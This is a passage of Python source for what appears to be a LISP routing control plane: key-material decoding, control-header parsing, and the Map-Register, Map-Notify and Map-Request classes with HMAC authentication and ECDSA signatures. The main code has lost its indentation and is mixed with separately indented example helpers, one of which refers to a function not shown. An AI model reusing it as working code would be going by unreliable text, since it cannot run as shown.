LISP_LCAF_SECURITY_TYPE, 0, socket.htons(sec_len), 1, 0)
#
# Put in cipher suite value. Support 1024-bit keys only. Then insert
# key-length and public key material. Do not negotiate the ECDH 25519
# cipher suite if the library is not installed on the system.
#
cs = self.cipher_suite
packet += struct.pack("BBH", cs, 0, socket.htons(key_len))
#
# Insert public-key.
#
for i in range(0, key_len * 2, 16):
key = int(pub_key[i:i+16], 16)
packet += struct.pack("Q", byte_swap_64(key))
#endfor
#
# Insert RLOC address.
#
if (rloc_addr):
packet += struct.pack("H", socket.htons(rloc_addr.afi))
packet += rloc_addr.pack_address()
#endif
return(packet)
#enddef
def decode_lcaf(self, packet, lcaf_len):
#
# Called by lisp_map_request().
#
if (lcaf_len == 0):
packet_format = "HHBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
afi, rsvd, lcaf_type, rsvd, lcaf_len = struct.unpack( \
packet_format, packet[:format_size])
if (lcaf_type != LISP_LCAF_SECURITY_TYPE):
packet = packet[lcaf_len + 6::]
return(packet)
#endif
lcaf_len = socket.ntohs(lcaf_len)
packet = packet[format_size::]
#endif
#
# Fall through or called by lisp_rloc_record() when lcaf_len is
# non-zero.
#
lcaf_type = LISP_LCAF_SECURITY_TYPE
packet_format = "BBBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
key_count, rsvd, cs, rsvd, key_len = struct.unpack(packet_format,
packet[:format_size])
#
# Advance the packet pointer to the beginning of the key material.
# Validate there is enough packet to pull the key out according to
# the encoded key length found earlier in the packet.
#
packet = packet[format_size::]
key_len = socket.ntohs(key_len)
if (len(packet) < key_len): return(None)
#
# Check Cipher Suites supported.
#
cs_list = [LISP_CS_25519_CBC, LISP_CS_25519_GCM, LISP_CS_25519_CHACHA,
LISP_CS_1024]
if (cs not in cs_list):
lprint("Cipher-suites {} supported, received {}".format(cs_list,
cs))
packet = packet[key_len::]
return(packet)
#endif
self.cipher_suite = cs
#
# Iterate to pull 8 bytes (64 bits) out at a time. The key is stored
# internally as an integer.
#
pub_key = 0
for i in range(0, key_len, 8):
key = byte_swap_64(struct.unpack("Q", packet[i:i+8])[0])
pub_key <<= 64
pub_key |= key
#endfor
self.remote_public_key = pub_key
#
# Convert to 32-byte binary string. Make sure leading 0s are included.
# ;-)
#
if (self.curve25519):
key = lisp_hex_string(self.remote_public_key)
key = key.zfill(64)
new_key = b""
for i in range(0, len(key), 2):
byte = int(key[i:i+2], 16)
new_key += lisp_store_byte(byte)
#endfor
self.remote_public_key = new_key
#endif
packet = packet[key_len::]
return(packet)
#enddef
#endclass
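#
# Illustrative sketch (toy numbers, not called anywhere in this file):
# the modular-exponentiation form of Diffie-Hellman used by lisp_keys
# when curve25519 is not in use. Both sides derive the same shared key
# from each other's public value, as in compute_shared_key() above.
#
def lisp_example_dh_toy():
    g, p = 5, 23
    a, b = 6, 15                        # private values, one per side
    pub_a = (g**a) % p                  # public values that are exchanged
    pub_b = (g**b) % p
    return(((pub_b**a) % p) == ((pub_a**b) % p))
#enddef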
#
# lisp_store_byte
#
# We have to store a byte differently in a py2 string versus a py3 byte
# string. Check whether the code is running under python2 or python3.
#
def lisp_store_byte_py2(byte):
return(chr(byte))
#enddef
def lisp_store_byte_py3(byte):
return(bytes([byte]))
#enddef
lisp_store_byte = lisp_store_byte_py2
if (lisp_is_python3()): lisp_store_byte = lisp_store_byte_py3
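#
# For example, lisp_store_byte(0x41) returns the one-character string "A"
# under python2 and the byte string b"A" under python3.
#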
#
# lisp_thread()
#
# Used to multi-thread the data-plane.
#
class lisp_thread(object):
def __init__(self, name):
self.thread_name = name
self.thread_number = -1
self.number_of_pcap_threads = 0
self.number_of_worker_threads = 0
self.input_queue = queue.Queue()
self.input_stats = lisp_stats()
self.lisp_packet = lisp_packet(None)
#enddef
#endclass
#------------------------------------------------------------------------------
#
# The LISP fixed control header:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=x | Reserved | Record Count |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_control_header(object):
def __init__(self):
self.type = 0
self.record_count = 0
self.nonce = 0
self.rloc_probe = False
self.smr_bit = False
self.smr_invoked_bit = False
self.ddt_bit = False
self.to_etr = False
self.to_ms = False
self.info_reply = False
#enddef
def decode(self, packet):
packet_format = "BBBBQ"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(False)
typeval, bits, reserved, self.record_count, self.nonce = \
struct.unpack(packet_format, packet[:format_size])
self.type = typeval >> 4
if (self.type == LISP_MAP_REQUEST):
self.smr_bit = True if (typeval & 0x01) else False
self.rloc_probe = True if (typeval & 0x02) else False
self.smr_invoked_bit = True if (bits & 0x40) else False
#endif
if (self.type == LISP_ECM):
self.ddt_bit = True if (typeval & 0x04) else False
self.to_etr = True if (typeval & 0x02) else False
self.to_ms = True if (typeval & 0x01) else False
#endif
if (self.type == LISP_NAT_INFO):
self.info_reply = True if (typeval & 0x08) else False
#endif
return(True)
#enddef
def is_info_request(self):
return((self.type == LISP_NAT_INFO and self.is_info_reply() == False))
#enddef
def is_info_reply(self):
return(True if self.info_reply else False)
#enddef
def is_rloc_probe(self):
return(True if self.rloc_probe else False)
#enddef
def is_smr(self):
return(True if self.smr_bit else False)
#enddef
def is_smr_invoked(self):
return(True if self.smr_invoked_bit else False)
#enddef
def is_ddt(self):
return(True if self.ddt_bit else False)
#enddef
def is_to_etr(self):
return(True if self.to_etr else False)
#enddef
def is_to_ms(self):
return(True if self.to_ms else False)
#enddef
#endclass
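#
# Illustrative sketch (not called anywhere in this file): the message
# type is the high-order nibble of the first byte, so a received control
# packet can be classified before a full lisp_control_header.decode().
#
def lisp_example_control_type(packet):
    typeval = struct.unpack("B", packet[0:1])[0]
    return(typeval >> 4)
#enddef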
#
# The Map-Register message format is:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=3 |P|S|I| Reserved | kid |e|F|T|a|m|M| Record Count |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Key ID | Algorithm ID | Authentication Data Length |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# ~ Authentication Data ~
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | Record TTL |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# R | Locator Count | EID mask-len | ACT |A| Reserved |
# e +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# c | Rsvd | Map-Version Number | EID-Prefix-AFI |
# o +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# r | EID-Prefix |
# d +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | /| Priority | Weight | M Priority | M Weight |
# | L +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | o | Unused Flags |L|p|R| Loc-AFI |
# | c +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | \| Locator |
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# | |
# +- ... xTR router-ID ... -+
# | |
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# +- ... xTR site-ID ... -+
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# kid is one of 8 values that describes the encryption key-id used for
# encrypting Map-Register messages. When the Map-Register is encrypted, the
# entire message, not including the first 4 bytes, is chacha20 encrypted.
# The e-bit must be set by the ETR to indicate that the Map-Register was
# encrypted.
#
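#
# Illustrative sketch (not called anywhere in this file): how the e-bit
# and the 3-bit kid are carried in the first long of a Map-Register,
# mirroring the encode()/decode() methods of the class below.
#
def lisp_example_map_register_kid(first_long):
    encrypted = (first_long & 0x2000) != 0
    kid = (first_long >> 14) & 0x7
    return(encrypted, kid)
#enddef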
class lisp_map_register(object):
def __init__(self):
self.proxy_reply_requested = False
self.lisp_sec_present = False
self.xtr_id_present = False
self.map_notify_requested = False
self.mobile_node = False
self.merge_register_requested = False
self.use_ttl_for_timeout = False
self.map_register_refresh = False
self.record_count = 0
self.nonce = 0
self.alg_id = 0
self.key_id = 0
self.auth_len = 0
self.auth_data = 0
self.xtr_id = 0
self.site_id = 0
self.record_count = 0
self.sport = 0
self.encrypt_bit = 0
self.encryption_key_id = None
#enddef
def print_map_register(self):
xtr_id = lisp_hex_string(self.xtr_id)
line = ("{} -> flags: {}{}{}{}{}{}{}{}{}, record-count: " +
"{}, nonce: 0x{}, key/alg-id: {}/{}{}, auth-len: {}, xtr-id: " +
"0x{}, site-id: {}")
lprint(line.format(bold("Map-Register", False), \
"P" if self.proxy_reply_requested else "p",
"S" if self.lisp_sec_present else "s",
"I" if self.xtr_id_present else "i",
"T" if self.use_ttl_for_timeout else "t",
"R" if self.merge_register_requested else "r",
"M" if self.mobile_node else "m",
"N" if self.map_notify_requested else "n",
"F" if self.map_register_refresh else "f",
"E" if self.encrypt_bit else "e",
self.record_count, lisp_hex_string(self.nonce), self.key_id,
self.alg_id, " (sha1)" if (self.key_id == LISP_SHA_1_96_ALG_ID) \
else (" (sha2)" if (self.key_id == LISP_SHA_256_128_ALG_ID) else \
""), self.auth_len, xtr_id, self.site_id))
#enddef
def encode(self):
first_long = (LISP_MAP_REGISTER << 28) | self.record_count
if (self.proxy_reply_requested): first_long |= 0x08000000
if (self.lisp_sec_present): first_long |= 0x04000000
if (self.xtr_id_present): first_long |= 0x02000000
if (self.map_register_refresh): first_long |= 0x1000
if (self.use_ttl_for_timeout): first_long |= 0x800
if (self.merge_register_requested): first_long |= 0x400
if (self.mobile_node): first_long |= 0x200
if (self.map_notify_requested): first_long |= 0x100
if (self.encryption_key_id != None):
first_long |= 0x2000
first_long |= self.encryption_key_id << 14
#endif
#
# Append zeroed authentication data so we can compute the hash later.
#
if (self.alg_id == LISP_NONE_ALG_ID):
self.auth_len = 0
else:
if (self.alg_id == LISP_SHA_1_96_ALG_ID):
self.auth_len = LISP_SHA1_160_AUTH_DATA_LEN
#endif
if (self.alg_id == LISP_SHA_256_128_ALG_ID):
self.auth_len = LISP_SHA2_256_AUTH_DATA_LEN
#endif
#endif
packet = struct.pack("I", socket.htonl(first_long))
packet += struct.pack("QBBH", self.nonce, self.key_id, self.alg_id,
socket.htons(self.auth_len))
packet = self.zero_auth(packet)
return(packet)
#enddef
def zero_auth(self, packet):
offset = struct.calcsize("I") + struct.calcsize("QHH")
auth_data = b""
auth_len = 0
if (self.alg_id == LISP_NONE_ALG_ID): return(packet)
if (self.alg_id == LISP_SHA_1_96_ALG_ID):
auth_data = struct.pack("QQI", 0, 0, 0)
auth_len = struct.calcsize("QQI")
#endif
if (self.alg_id == LISP_SHA_256_128_ALG_ID):
auth_data = struct.pack("QQQQ", 0, 0, 0, 0)
auth_len = struct.calcsize("QQQQ")
#endif
packet = packet[0:offset] + auth_data + packet[offset+auth_len::]
return(packet)
#enddef
def encode_auth(self, packet):
offset = struct.calcsize("I") + struct.calcsize("QHH")
auth_len = self.auth_len
auth_data = self.auth_data
packet = packet[0:offset] + auth_data + packet[offset + auth_len::]
return(packet)
#enddef
def decode(self, packet):
orig_packet = packet
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return([None, None])
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = socket.ntohl(first_long[0])
packet = packet[format_size::]
packet_format = "QBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return([None, None])
self.nonce, self.key_id, self.alg_id, self.auth_len = \
struct.unpack(packet_format, packet[:format_size])
self.nonce = byte_swap_64(self.nonce)
self.auth_len = socket.ntohs(self.auth_len)
self.proxy_reply_requested = True if (first_long & 0x08000000) \
else False
self.lisp_sec_present = True if (first_long & 0x04000000) else False
self.xtr_id_present = True if (first_long & 0x02000000) else False
self.use_ttl_for_timeout = True if (first_long & 0x800) else False
self.map_register_refresh = True if (first_long & 0x1000) else False
self.merge_register_requested = True if (first_long & 0x400) else False
self.mobile_node = True if (first_long & 0x200) else False
self.map_notify_requested = True if (first_long & 0x100) else False
self.record_count = first_long & 0xff
#
# Decode e-bit and key-id for Map-Register decryption.
#
self.encrypt_bit = True if first_long & 0x2000 else False
if (self.encrypt_bit):
self.encryption_key_id = (first_long >> 14) & 0x7
#endif
#
# Decode xTR-ID and site-ID if sender set the xtr_id_present bit.
#
if (self.xtr_id_present):
if (self.decode_xtr_id(orig_packet) == False): return([None, None])
#endif
packet = packet[format_size::]
#
# Parse authentication and zero out the auth field in the packet.
#
if (self.auth_len != 0):
if (len(packet) < self.auth_len): return([None, None])
if (self.alg_id not in (LISP_NONE_ALG_ID, LISP_SHA_1_96_ALG_ID,
LISP_SHA_256_128_ALG_ID)):
lprint("Invalid authentication alg-id: {}".format(self.alg_id))
return([None, None])
#endif
auth_len = self.auth_len
if (self.alg_id == LISP_SHA_1_96_ALG_ID):
format_size = struct.calcsize("QQI")
if (auth_len < format_size):
lprint("Invalid sha1-96 authentication length")
return([None, None])
#endif
auth1, auth2, auth3 = struct.unpack("QQI", packet[:auth_len])
auth4 = b""
elif (self.alg_id == LISP_SHA_256_128_ALG_ID):
format_size = struct.calcsize("QQQQ")
if (auth_len < format_size):
lprint("Invalid sha2-256 authentication length")
return([None, None])
#endif
auth1, auth2, auth3, auth4 = struct.unpack("QQQQ",
packet[:auth_len])
else:
lprint("Unsupported authentication alg-id value {}".format( \
self.alg_id))
return([None, None])
#endif
self.auth_data = lisp_concat_auth_data(self.alg_id, auth1, auth2,
auth3, auth4)
orig_packet = self.zero_auth(orig_packet)
packet = packet[self.auth_len::]
#endif
return([orig_packet, packet])
#enddef
def encode_xtr_id(self, packet):
xtr_id_upper = self.xtr_id >> 64
xtr_id_lower = self.xtr_id & 0xffffffffffffffff
xtr_id_upper = byte_swap_64(xtr_id_upper)
xtr_id_lower = byte_swap_64(xtr_id_lower)
site_id = byte_swap_64(self.site_id)
packet += struct.pack("QQQ", xtr_id_upper, xtr_id_lower, site_id)
return(packet)
#enddef
def decode_xtr_id(self, packet):
format_size = struct.calcsize("QQQ")
if (len(packet) < format_size): return([None, None])
packet = packet[len(packet)-format_size::]
xtr_id_upper, xtr_id_lower, site_id = struct.unpack("QQQ",
packet[:format_size])
xtr_id_upper = byte_swap_64(xtr_id_upper)
xtr_id_lower = byte_swap_64(xtr_id_lower)
self.xtr_id = (xtr_id_upper << 64) | xtr_id_lower
self.site_id = byte_swap_64(site_id)
return(True)
#enddef
#endclass
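#
# Note: decode_xtr_id() above pulls the xTR-ID and site-ID from the last
# 24 bytes of the Map-Register, since those fields are appended after all
# EID-records; the 128-bit xTR-ID travels as two byte-swapped 64-bit
# halves.
#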
# The Map-Notify/Map-Notify-Ack message format is:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=4/5| Reserved | Record Count |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Key ID | Algorithm ID | Authentication Data Length |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# ~ Authentication Data ~
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | Record TTL |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# R | Locator Count | EID mask-len | ACT |A| Reserved |
# e +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# c | Rsvd | Map-Version Number | EID-Prefix-AFI |
# o +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# r | EID-Prefix |
# d +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | /| Priority | Weight | M Priority | M Weight |
# | L +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | o | Unused Flags |L|p|R| Loc-AFI |
# | c +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | \| Locator |
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_map_notify(object):
def __init__(self, lisp_sockets):
self.etr = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.etr_port = 0
self.retransmit_timer = None
self.lisp_sockets = lisp_sockets
self.retry_count = 0
self.record_count = 0
self.alg_id = LISP_NONE_ALG_ID
self.key_id = 0
self.auth_len = 0
self.auth_data = ""
self.nonce = 0
self.nonce_key = ""
self.packet = None
self.site = ""
self.map_notify_ack = False
self.eid_records = ""
self.eid_list = []
#enddef
def print_notify(self):
auth_data = binascii.hexlify(self.auth_data)
if (self.alg_id == LISP_SHA_1_96_ALG_ID and len(auth_data) != 40):
auth_data = self.auth_data
elif (self.alg_id == LISP_SHA_256_128_ALG_ID and len(auth_data) != 64):
auth_data = self.auth_data
#endif
line = ("{} -> record-count: {}, nonce: 0x{}, key/alg-id: " +
"{}{}{}, auth-len: {}, auth-data: {}")
lprint(line.format(bold("Map-Notify-Ack", False) if \
self.map_notify_ack else bold("Map-Notify", False),
self.record_count, lisp_hex_string(self.nonce), self.key_id,
self.alg_id, " (sha1)" if (self.key_id == LISP_SHA_1_96_ALG_ID) \
else (" (sha2)" if (self.key_id == LISP_SHA_256_128_ALG_ID) else \
""), self.auth_len, auth_data))
#enddef
def zero_auth(self, packet):
if (self.alg_id == LISP_NONE_ALG_ID): return(packet)
if (self.alg_id == LISP_SHA_1_96_ALG_ID):
auth_data = struct.pack("QQI", 0, 0, 0)
#endif
if (self.alg_id == LISP_SHA_256_128_ALG_ID):
auth_data = struct.pack("QQQQ", 0, 0, 0, 0)
#endif
packet += auth_data
return(packet)
#enddef
def encode(self, eid_records, password):
if (self.map_notify_ack):
first_long = (LISP_MAP_NOTIFY_ACK << 28) | self.record_count
else:
first_long = (LISP_MAP_NOTIFY << 28) | self.record_count
#endif
packet = struct.pack("I", socket.htonl(first_long))
packet += struct.pack("QBBH", self.nonce, self.key_id, self.alg_id,
socket.htons(self.auth_len))
if (self.alg_id == LISP_NONE_ALG_ID):
self.packet = packet + eid_records
return(self.packet)
#endif
#
# Run authentication hash across packet.
#
packet = self.zero_auth(packet)
packet += eid_records
hashval = lisp_hash_me(packet, self.alg_id, password, False)
offset = struct.calcsize("I") + struct.calcsize("QHH")
auth_len = self.auth_len
self.auth_data = hashval
packet = packet[0:offset] + hashval + packet[offset + auth_len::]
self.packet = packet
return(packet)
#enddef
def decode(self, packet):
orig_packet = packet
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = socket.ntohl(first_long[0])
self.map_notify_ack = ((first_long >> 28) == LISP_MAP_NOTIFY_ACK)
self.record_count = first_long & 0xff
packet = packet[format_size::]
packet_format = "QBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
self.nonce, self.key_id, self.alg_id, self.auth_len = \
struct.unpack(packet_format, packet[:format_size])
self.nonce_key = lisp_hex_string(self.nonce)
self.auth_len = socket.ntohs(self.auth_len)
packet = packet[format_size::]
self.eid_records = packet[self.auth_len::]
if (self.auth_len == 0): return(self.eid_records)
#
# Parse authentication and zero out the auth field in the packet.
#
if (len(packet) < self.auth_len): return(None)
auth_len = self.auth_len
if (self.alg_id == LISP_SHA_1_96_ALG_ID):
auth1, auth2, auth3 = struct.unpack("QQI", packet[:auth_len])
auth4 = ""
#endif
if (self.alg_id == LISP_SHA_256_128_ALG_ID):
auth1, auth2, auth3, auth4 = struct.unpack("QQQQ",
packet[:auth_len])
#endif
self.auth_data = lisp_concat_auth_data(self.alg_id, auth1, auth2,
auth3, auth4)
format_size = struct.calcsize("I") + struct.calcsize("QHH")
packet = self.zero_auth(orig_packet[:format_size])
format_size += auth_len
packet += orig_packet[format_size::]
return(packet)
#enddef
#endclass
#
# Map-Request message format is:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=1 |A|M|P|S|p|s|m|I|Reserved |L|D| IRC | Record Count |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Source-EID-AFI | Source EID Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ITR-RLOC-AFI 1 | ITR-RLOC Address 1 ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ITR-RLOC-AFI n | ITR-RLOC Address n ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# / |N| Reserved | EID mask-len | EID-prefix-AFI |
# Rec +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# \ | EID-prefix ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Map-Reply Record ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Mapping Protocol Data |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | xTR-ID |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# When a Map-Request is signed, the hash is over the IPv6 CGA-based EID,
# the Map-Request Nonce, and the EID-record. The signature is placed in
# the Source-EID as an LCAF JSON Type string of { "source-eid" : "<cga>",
# "signature-eid" : "<cga-of-signer>", "signature" : "<sig>" }.
#
# Generating private/public key-pairs via:
#
# openssl genpkey -algorithm RSA -out privkey.pem \
# -pkeyopt rsa_keygen_bits:2048
# openssl rsa -pubout -in privkey.pem -out pubkey.pem
#
# Then use ecdsa.VerifyingKey.from_pem() after reading in the file.
#
# xTR-ID is appended to the end of a Map-Request when a subscription request
# is piggybacked (when self.subscribe_bit is True).
#
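#
# Illustrative sketch (not called anywhere in this file, and it generates
# a throwaway keypair rather than reading privkey.pem): the signature
# input is the nonce in hex concatenated with the printed source and
# target EIDs, as built in sign_map_request() and checked in
# verify_map_request_sig() below.
#
def lisp_example_map_request_sig():
    privkey = ecdsa.SigningKey.generate()
    pubkey = privkey.get_verifying_key()
    sig_data = lisp_hex_string(0x123456789) + "2001:db8::1" + "10.0.0.1"
    signature = privkey.sign(sig_data.encode())
    return(pubkey.verify(signature, sig_data.encode()))
#enddef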
class lisp_map_request(object):
def __init__(self):
self.auth_bit = False
self.map_data_present = False
self.rloc_probe = False
self.smr_bit = False
self.pitr_bit = False
self.smr_invoked_bit = False
self.mobile_node = False
self.xtr_id_present = False
self.local_xtr = False
self.dont_reply_bit = False
self.itr_rloc_count = 0
self.record_count = 0
self.nonce = 0
self.signature_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.source_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.target_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.target_group = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.itr_rlocs = []
self.keys = None
self.privkey_filename = None
self.map_request_signature = None
self.subscribe_bit = False
self.xtr_id = None
self.json_telemetry = None
#enddef
def print_prefix(self):
if (self.target_group.is_null()):
return(green(self.target_eid.print_prefix(), False))
#endif
return(green(self.target_eid.print_sg(self.target_group), False))
#enddef
def print_map_request(self):
xtr_id = ""
if (self.xtr_id != None and self.subscribe_bit):
xtr_id = "subscribe, xtr-id: 0x{}, ".format(lisp_hex_string( \
self.xtr_id))
#endif
line = ("{} -> flags: {}{}{}{}{}{}{}{}{}{}, itr-rloc-" +
"count: {} (+1), record-count: {}, nonce: 0x{}, source-eid: " +
"afi {}, {}{}, target-eid: afi {}, {}, {}ITR-RLOCs:")
lprint(line.format(bold("Map-Request", False), \
"A" if self.auth_bit else "a",
"D" if self.map_data_present else "d",
"R" if self.rloc_probe else "r",
"S" if self.smr_bit else "s",
"P" if self.pitr_bit else "p",
"I" if self.smr_invoked_bit else "i",
"M" if self.mobile_node else "m",
"X" if self.xtr_id_present else "x",
"L" if self.local_xtr else "l",
"D" if self.dont_reply_bit else "d", self.itr_rloc_count,
self.record_count, lisp_hex_string(self.nonce),
self.source_eid.afi, green(self.source_eid.print_address(), False),
" (with sig)" if self.map_request_signature != None else "",
self.target_eid.afi, green(self.print_prefix(), False), xtr_id))
keys = self.keys
for itr in self.itr_rlocs:
if (itr.afi == LISP_AFI_LCAF and self.json_telemetry != None):
continue
#endif
itr_str = red(itr.print_address_no_iid(), False)
lprint(" itr-rloc: afi {} {}{}".format(itr.afi, itr_str,
"" if (keys == None) else ", " + keys[1].print_keys()))
keys = None
#endfor
if (self.json_telemetry != None):
lprint(" itr-rloc: afi {} telemetry: {}".format(LISP_AFI_LCAF,
self.json_telemetry))
#endif
#enddef
def sign_map_request(self, privkey):
sig_eid = self.signature_eid.print_address()
source_eid = self.source_eid.print_address()
target_eid = self.target_eid.print_address()
sig_data = lisp_hex_string(self.nonce) + source_eid + target_eid
self.map_request_signature = privkey.sign(sig_data.encode())
sig = binascii.b2a_base64(self.map_request_signature)
sig = { "source-eid" : source_eid, "signature-eid" : sig_eid,
"signature" : sig.decode() }
return(json.dumps(sig))
#enddef
def verify_map_request_sig(self, pubkey):
sseid = green(self.signature_eid.print_address(), False)
if (pubkey == None):
lprint("Public-key not found for signature-EID {}".format(sseid))
return(False)
#endif
source_eid = self.source_eid.print_address()
target_eid = self.target_eid.print_address()
sig_data = lisp_hex_string(self.nonce) + source_eid + target_eid
pubkey = binascii.a2b_base64(pubkey)
good = True
try:
key = ecdsa.VerifyingKey.from_pem(pubkey)
except:
lprint("Invalid public-key in mapping system for sig-eid {}". \
format(self.signature_eid.print_address_no_iid()))
good = False
#endtry
if (good):
try:
sig_data = sig_data.encode()
good = key.verify(self.map_request_signature, sig_data)
except:
good = False
#endtry
#endif
passfail = bold("passed" if good else "failed", False)
